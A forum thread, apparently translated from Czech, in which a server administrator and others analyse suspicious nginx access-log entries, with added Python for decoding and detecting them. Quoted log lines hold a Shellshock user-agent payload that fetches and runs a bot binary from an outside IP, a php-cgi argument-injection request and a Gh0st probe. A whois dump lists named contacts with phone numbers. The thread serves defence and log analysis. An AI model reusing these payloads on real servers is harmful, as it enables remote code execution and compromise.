How to make a request with "\" in the URL
HotBurek ::
Hello.
In the log files I have noticed requests of the following form:
[27/Sep/2017:20:03:47 +0200] "\x00\x10\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x10\x11\x12\x13\x14\x15\x16" 400 172 "-" "-"
I would like to know how I could test such requests with code on the client side (and block the source).
If I enter e.g. tralala.com/\\x00 as the URL (in Python, not in a browser), the logs show /%5Cx00.
If I enter tralala.com/\x00, they show /%00.
I would like to try out these URLs and block this traffic. It is also interesting that in the logs such a request has no GET, HEAD or anything similar next to it; it is just empty.
root@debian:/# iptraf-ng
fatal: This program requires a screen size of at least 80 columns by 24 lines
Please resize your window
avian2 ::
You have not said which server you are using. In Apache, the notation "\x01" means that the request contained a byte with hex value 01. A literal "\x01" in the request would be written to the log as "\\x01".
Your log entry has no "GET", "HEAD", etc. because the string "\x00\x10\x00..." was evidently interpreted as the HTTP method name.
Here is a Python program you can use to experiment with similar requests. At least with Apache 2.4.10, however, a NULL byte (\x00) in the request aborts processing, so your particular request (which starts with \x00) is logged as just "".

import socket

# Open a plain TCP connection and send raw bytes, so the request line is exactly what we choose.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("localhost", 80))
s.sendall(b'\x01\x02\x03\r\n')
s.close()
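To read such entries from the defender's side, here is an added example (not code from the thread): it reverses the access-log escaping avian2 describes, so \x01 becomes the byte 0x01 while \\x01 becomes a literal backslash followed by x01, and then checks whether the recovered request line starts with a valid HTTP method token, which is what separates a binary probe like the one in the first post from a textual request. The quote() calls at the end reproduce the /%5Cx00 versus /%00 observation from the first post.

```python
import re
import string
from urllib.parse import quote

# Characters allowed in an HTTP token (RFC 7230 "tchar"); HTTP method names are tokens.
TCHAR = set(b"!#$%&'*+-.^_`|~" + string.ascii_letters.encode() + string.digits.encode())

# One escape in a logged field: either \xHH or a backslash followed by any single character.
_ESC = re.compile(rb'\\x([0-9A-Fa-f]{2})|\\(.)', re.DOTALL)


def unescape_log_field(field: str) -> bytes:
    r"""Undo the access-log escaping of one quoted field and return the raw bytes.

    \xHH becomes the byte 0xHH, \\ becomes one backslash, \" becomes a quote and
    \n, \r, \t become the control characters; anything else escaped is kept literally.
    """
    control = {b'n': b'\n', b'r': b'\r', b't': b'\t'}

    def repl(m):
        if m.group(1) is not None:
            return bytes([int(m.group(1), 16)])
        return control.get(m.group(2), m.group(2))

    return _ESC.sub(repl, field.encode('latin-1'))


def http_method(request_line: bytes):
    """Return the method name if the request line starts with a valid token and a space, else None."""
    sp = request_line.find(b' ')
    if sp <= 0:
        return None
    method = request_line[:sp]
    return method.decode('ascii') if all(b in TCHAR for b in method) else None


def classify(logged_request: str) -> str:
    """Label the quoted request field of one access-log line."""
    raw = unescape_log_field(logged_request)
    if not raw:
        return 'empty'       # the server logged "" (Apache aborting on a NUL byte, as described above)
    if http_method(raw) is not None:
        return 'http'        # a syntactically valid request line (it may still be malicious)
    if any(b < 0x20 or b >= 0x7f for b in raw):
        return 'binary'      # control or high bytes before any method token: not HTTP at all
    return 'malformed'       # printable text, but no method token followed by a space


if __name__ == '__main__':
    # Request field from the log line in the first post.
    probe = r'\x00\x10\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x10\x11\x12\x13\x14\x15\x16'
    print(unescape_log_field(probe), classify(probe))
    # A literal backslash-x-0-1 in the request is logged as \\x01, a raw 0x01 byte as \x01.
    print(unescape_log_field(r'\\x01'), unescape_log_field(r'\x01'))
    # Why the first post saw /%5Cx00 and /%00: the client percent-encodes the path before sending.
    print(quote('/\\x00'), quote('/\x00'))
```

The 'binary' label is the useful one for the first post's question: such a line never carried an HTTP method at all, so there is nothing for an application behind the server to trap; the only place it can be matched is the access log.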
HotBurek ::
Thanks for the sample. It does exactly what I needed. :)
Testing showed that the web server (nginx 1.6.2) already rejects the request itself (400 response) and does not forward such requests to the Python script.
I thought I would make a trap for these requests and block such traffic, but that will not work. Only via the log files.
jype ::
You can have a less sophisticated HTTP server: you can derive one from the one in the Go http library, or, if you are a Python person, from BaseHTTPServer (though that one will not be particularly performant).
HotBurek ::
My nginx config is as follows:
location / {
try_files /skripta.py =404;
include uwsgi_params;
uwsgi_modifier1 9;
uwsgi_pass 127.0.0.1:1234;
}
And I was counting on that \x00 going on to the script. Though maybe it is better this way.
It is hard to look at these requests in the logs, because I do not like them. :)
66.240.205.34 - - [29/Sep/2017:16:53:27 +0200] "Gh0st\xAD\x00\x00\x00\xE0\x00\x00\x00x\x9CKS``\x98\xC3\xC0\xC0\xC0\x06\xC4\x8C@\xBCQ\x96\x81\x81\x09H\x07\xA7\x16\x95e&\xA7*\x04$&g+\x182\x94\xF6\xB000\xAC\xA8rc\x00\x01\x11\xA0\x82\x1F\x5C`&\x83\xC7K7\x86\x19\xE5n\x0C9\x95n\x0C;\x84\x0F3\xAC\xE8sch\xA8^\xCF4'J\x97\xA9\x82\xE30\xC3\x91h]&\x90\xF8\xCE\x97S\xCBA4L?2=\xE1\xC4\x92\x86\x0B@\xF5`\x0CT\x1F\xAE\xAF]" 400 172 "-" "-"
jype ::
It has been a long time since I last read the nginx source, but I remember code that decides how to handle an HTTP request and returns 400 very early on if things are obviously invalid, and I do not recall any flag with which you could ask the server to ignore such findings.
In short, if you want to do "strange things" with HTTP, you need a server that gives you more control over request handling.
SeMiNeSanja ::
WatchGuard firewalls with their HTTP proxy can reject these and other 'unusual' requests (of course you have to configure such a filter yourself).
What else you could block this with, I would not know (nginx might be a candidate, but....). Most firewalls do not let you make such deep interventions into the traffic. Maybe there is some other exception out there. But by Murphy's law, you certainly do not own that one.
If it is merely about the annoying 'display', then with a bit of regexp you make a text filter that throws such lines out of the log file. On Linux at least, that is a piece of cake.
RC37 ::
Be careful when programming URLs, because there are ANSI escape sequences (that is the thing where there is a \ with some number/letter next to it so that the text is e.g. red). I know that some languages (C++) also complicate things if it is e.g. in the middle of quotes as something that is printed to the user.
HotBurek ::
Today a different type of request:
117.78.15.5 - - [30/Sep/2017:18:30:01 +0200] "POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 301 184 "-" "-"
How could I test such requests with the Python code above? If I put this string into s.sendall(x), the server shows 400.
Are such requests dangerous at all? (nginx)
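To answer "are such requests dangerous?" from the log alone, the request target has to be percent-decoded and read. The following is an added example, not code from the thread or from nginx: it decodes the target from the log line above (joined back into one string), parses the -d name=value options the query carries and reports which php.ini settings they try to override. A bare string sent with s.sendall() is not a complete request, which is why nginx answers 400; the as_raw_request() helper (an assumed name) wraps the target in the minimal framing a replay against your own server needs.

```python
import shlex
from urllib.parse import unquote, unquote_plus

# Request target copied from the log line quoted above, joined back into one string.
REQUEST_TARGET = (
    "//%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65"
    "%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D"
    "%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69"
    "%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65"
    "%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E"
)

# php.ini settings whose override from the command line matters to a defender: each one removes a
# safety limit or makes php-cgi treat the request body as code.
RISKY_SETTINGS = {
    'auto_prepend_file': 'a file (here the request body, php://input) is executed before every script',
    'allow_url_include': 'include/require may load code from a URL',
    'disable_functions': 'the list of disabled functions is emptied',
    'open_basedir': 'the filesystem restriction is lifted',
    'safe_mode': 'the old safe_mode restriction is switched off',
    'suhosin.simulation': 'the Suhosin hardening extension is put into log-only mode',
}


def decode_target(target: str):
    """Split a request target into path and query and percent-decode both ('+' is a space only in the query)."""
    path, _, query = target.partition('?')
    return unquote(path), unquote_plus(query)


def php_cgi_options(query_text: str):
    """Parse a php-cgi style option string into (-d settings, other flags).
    Every value seen is kept, since scanners often repeat a setting."""
    try:
        tokens = shlex.split(query_text)
    except ValueError:          # unbalanced quotes: fall back to a plain split
        tokens = query_text.split()
    settings, flags = {}, []
    i = 0
    while i < len(tokens):
        if tokens[i] == '-d' and i + 1 < len(tokens):
            key, _, value = tokens[i + 1].partition('=')
            settings.setdefault(key, []).append(value)
            i += 2
        else:
            flags.append(tokens[i])
            i += 1
    return settings, flags


def assess(target: str) -> dict:
    """Decode the target and say whether it is the php-cgi argument-injection pattern."""
    path, query = decode_target(target)
    settings, flags = php_cgi_options(query)
    findings = [f'{key}={value}: {RISKY_SETTINGS[key]}'
                for key, values in settings.items() if key in RISKY_SETTINGS
                for value in values]
    return {
        'path': path,
        'settings': settings,
        'flags': flags,
        'findings': findings,
        # The pattern: the php-cgi binary addressed directly under cgi-bin, with php.ini overrides in the query.
        'php_cgi_argument_injection': path.rstrip('/').endswith('cgi-bin/php') and bool(findings),
    }


def as_raw_request(target: str, host: str = 'localhost') -> bytes:
    """Minimal framing (request line, Host, empty body) for replaying a target against your own
    server with the raw-socket snippet from earlier in the thread."""
    return f'POST {target} HTTP/1.1\r\nHost: {host}\r\nContent-Length: 0\r\n\r\n'.encode('ascii')


if __name__ == '__main__':
    result = assess(REQUEST_TARGET)
    print(result['path'])
    for line in result['findings']:
        print(' -', line)
    print('php-cgi argument injection:', result['php_cgi_argument_injection'])
```

Decoded, the path is //cgi-bin/php and the query is a php-cgi command line that switches off several safety settings and makes php-cgi execute the request body (auto_prepend_file=php://input). That only matters on a host where the PHP CGI binary is actually exposed under /cgi-bin/; with the nginx configuration shown earlier, which hands every path to the uWSGI application, the request never reaches a PHP interpreter (nginx answered 301, meaning it accepted the request as syntactically valid and redirected it). It is still a useful log signature: a query containing -d auto_prepend_file identifies a scanner source whose IP you may want to block.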
Horejšio ::
HTTP 400 is fine. The server rejects it. It does look like an intrusion attempt to me, though. The script does not matter. The HTTP server should be the latest version. In the log you also have the IP of the perpetrator, and you can block it with iptables, for example.
Horejšio ::
Results for 117.78.15.5 :
% [whois.apnic.net]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
% Information related to '117.78.0.0 - 117.78.63.255'
% Abuse contact for '117.78.0.0 - 117.78.63.255' is 'ipas@cnnic.cn'
inetnum: 117.78.0.0 - 117.78.63.255
netname: HWCSNET
country: CN
descr: Huawei Public Cloud Service (Huawei Software Technologies Ltd.Co)
descr: No.2018 Xuegang Road,Bantian street,Longgang District,
descr: Shenzhen,Guangdong Province, 518129 P.R.China
admin-c: QL1346-AP
admin-c: GQ305-AP
tech-c: HC1956-AP
tech-c: XW3200-AP
status: ALLOCATED PORTABLE
mnt-by: MAINT-CNNIC-AP
mnt-lower: MAINT-CNNIC-AP
mnt-routes: MAINT-CNNIC-AP
mnt-irt: IRT-CNNIC-CN
changed: hm-changed@apnic.net 20121129
source: APNIC
irt: IRT-CNNIC-CN
address: Beijing, China
e-mail: ipas@cnnic.cn
abuse-mailbox: ipas@cnnic.cn
admin-c: IP50-AP
tech-c: IP50-AP
auth: # Filtered
remarks: Please note that CNNIC is not an ISP and is not
remarks: empowered to investigate complaints of network abuse.
remarks: Please contact the tech-c or admin-c of the network.
mnt-by: MAINT-CNNIC-AP
changed: ipas@cnnic.cn 20110428
source: APNIC
person: Guifang Qiu
nic-hdl: GQ305-AP
e-mail: hwclouds.cs@huawei.com
address: No.3 Information Road, Shangdi
address: Haidian District,Beijing,100140 P.R.China
phone: +86-18618124392
country: CN
changed: ipas@cnnic.net.cn 20170307
mnt-by: MAINT-CNNIC-AP
source: APNIC
person: Houyou Chen
nic-hdl: HC1956-AP
e-mail: hws_security@huawei.com
address: No.3 Information Road, Shangdi
address: Haidian District,Beijing,100140 P.R.China
phone: +86-18127092993
country: CN
changed: ipas@cnnic.net.cn 20170307
mnt-by: MAINT-CNNIC-AP
source: APNIC
person: Quansheng Liu
nic-hdl: QL1346-AP
e-mail: hws_security@huawei.com
address: No.2018 Xuegang Road,Bantian street,Longgang District
address: Shenzhen,Guangdong Province, 518129 P.R.China
phone: +86-18988786266
country: CN
changed: ipas@cnnic.net.cn 20170307
mnt-by: MAINT-CNNIC-AP
source: APNIC
person: Xiaolin Wei
nic-hdl: XW3200-AP
e-mail: hwclouds.cs@huawei.com
address: No.2018 Xuegang Road,Bantian street,Longgang District,
address: Shenzhen,Guangdong Province, 518129 P.R.China
phone: +86-13650985705
country: CN
changed: ipas@cnnic.net.cn 20170307
mnt-by: MAINT-CNNIC-AP
source: APNIC
% Information related to '117.78.0.0/17AS4837'
route: 117.78.0.0/17
descr: CNC Group CHINA169 Sichuan Province Network
descr: Addresses from CNNIC(TimeNet)
country: CN
origin: AS4837
mnt-by: MAINT-CNCGROUP-RR
changed: abuse@cnc-noc.net 20070929
source: APNIC
% This query was served by the APNIC Whois Service version 1.88.15-37 (WHOIS-UK4)
HotBurek ::
New week, new request :)
94.180.115.102 - - [01/Oct/2017:14:35:19 +0200] "GET / HTTP/1.0" 301 184 "-" "() { :;}; /bin/bash -c \x22curl -o /tmp/log http://179.185.16.20/log;/usr/bin/wget http://179.185.16.20/log -O /tmp/log;wget http://179.185.16.20/log -O /dev/shm/log;chmod +x /dev/shm/log /tmp/log;/dev/shm/log;/tmp/log;rm -rf /dev/shm/log /tmp/log*\x22"
This one entered some commands into the user agent. The source is RU, the 179 IP is in BR.
Can anyone decipher the log file at http://179.185.16.20/log ?
misek ::
Can anyone decipher the log file at http://179.185.16.20/log ?
Is that an IRC server for remote access?
HotBurek ::
In the header it says DDoS Perl IrcBot v1.0 / 2017 by flood.ro Team
Looks like a continuation of this https://gist.github.com/tlongren/afe816...
Horejšio ::
You can alert the network service provider about the attack.
Horejšio ::
New week, new request :)
94.180.115.102 - - [01/Oct/2017:14:35:19 +0200] "GET / HTTP/1.0" 301 184 "-" "() { :;}; /bin/bash -c \x22curl -o /tmp/log http://179.185.16.20/log;/usr/bin/wget http://179.185.16.20/log -O /tmp/log;wget http://179.185.16.20/log -O /dev/shm/log;chmod +x /dev/shm/log /tmp/log;/dev/shm/log;/tmp/log;rm -rf /dev/shm/log /tmp/log*\x22"
Shellshock (software bug) @ Wikipedia
Regards
This one entered some commands into the user agent. The source is RU, the 179 IP is in BR.
Can anyone decipher the log file at http://179.185.16.20/log ?
That last one is a Shellshock test: "/bin/bash -c \x22curl .."
Over & out. Exit 0;
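A detection pass over the access log for the request Horejšio identifies above as a Shellshock probe, added here as an example (not code from the thread): it parses combined-format lines, looks for the "() { :;};" trigger in the request, referer and user-agent fields, and pulls out the source IP and the download URLs, which is the information an iptables rule or an abuse report to the provider needs. The first sample line is the one quoted in the thread; the second is a constructed benign request.

```python
import re

# Apache/nginx "combined" log format: ip ident user [time] "request" status bytes "referer" "user-agent".
# A quoted field may contain escaped characters (\xHH, \"), hence the (?:[^"\\]|\\.)* groups.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# The Shellshock trigger as it appears in the log: an empty function body "() { :;};" followed by commands.
# nginx logs a double quote inside a field as \x22, so the text is matched in its escaped form.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{\s*:;\s*\};')

# URLs inside the payload: where a second stage would be fetched from (what an abuse report needs).
URL_RE = re.compile(r'https?://[^\s;\'"\\]+')

# Sample lines: the first is the log line quoted in this thread, the second is a constructed benign request.
SAMPLE_LINES = [
    r'''94.180.115.102 - - [01/Oct/2017:14:35:19 +0200] "GET / HTTP/1.0" 301 184 "-" "() { :;}; /bin/bash -c \x22curl -o /tmp/log http://179.185.16.20/log;/usr/bin/wget http://179.185.16.20/log -O /tmp/log;wget http://179.185.16.20/log -O /dev/shm/log;chmod +x /dev/shm/log /tmp/log;/dev/shm/log;/tmp/log;rm -rf /dev/shm/log /tmp/log*\x22"''',
    '203.0.113.7 - - [01/Oct/2017:14:40:00 +0200] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]


def parse_combined(line: str):
    """Return the fields of one combined-format line as a dict, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def shellshock_finding(line: str):
    """Report a Shellshock probe in any quoted field of the line, with the source IP and the URLs
    the payload refers to; None for lines that do not parse or do not match."""
    rec = parse_combined(line)
    if rec is None:
        return None
    fields = [f for f in ('request', 'referer', 'ua') if SHELLSHOCK_RE.search(rec[f])]
    if not fields:
        return None
    urls = sorted({u for f in fields for u in URL_RE.findall(rec[f])})
    return {'ip': rec['ip'], 'time': rec['time'], 'status': rec['status'], 'fields': fields, 'urls': urls}


def scan(lines):
    """Run the check over an iterable of log lines and return the findings."""
    return [hit for hit in map(shellshock_finding, lines) if hit is not None]


if __name__ == '__main__':
    for hit in scan(SAMPLE_LINES):
        print(f"{hit['time']} {hit['ip']} shellshock probe in {','.join(hit['fields'])}; refers to {hit['urls']}")
```

The probe only does anything on a server that passes request headers to a vulnerable bash, typically through a CGI handler; with the nginx-to-uWSGI setup in this thread there is no such handler, and the 301 shows nginx simply redirected the request. Matching is done on the escaped text exactly as nginx writes it, so the \x22 quotes need no decoding for this check.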
Horejšio ::
If you have e.g. RDP open to the internet, that is a really great target. Port 3389 is probably the most popular among hackers on Windows. You absolutely must restrict access to the port on the firewall. I am not that familiar with Windows; maybe this is OK advice: http://searchsecurity.techtarget.com/ti...